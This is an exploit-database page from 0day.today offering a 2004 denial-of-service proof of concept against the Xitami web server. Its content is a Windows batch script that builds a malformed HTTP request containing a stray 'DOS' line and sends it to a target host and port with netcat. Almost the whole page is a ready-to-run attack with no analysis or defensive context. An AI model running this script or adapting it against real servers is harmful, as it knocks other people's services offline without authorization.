[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Xitami Web Server Denial of Service Exploit

Author
CoolICE
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5863
Category
dos / poc
Date add
21-07-2004
Platform
unsorted
===========================================
Xitami Web Server Denial of Service Exploit
===========================================


if '%1'=='' echo Usage:%0 target [port]&&goto :eof
set PORT=80
if not '%2'=='' set PORT=%2
for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe echo Need nc.exe&&goto :eof
echo GET / HTTP/1.0>http.tmp
echo HOST: %1>>http.tmp
echo DOS>>http.tmp
echo.>>http.tmp
nc -w 10 %1 %PORT% < http.tmp
del http.tmp



#  0day.today [2024-12-25]  #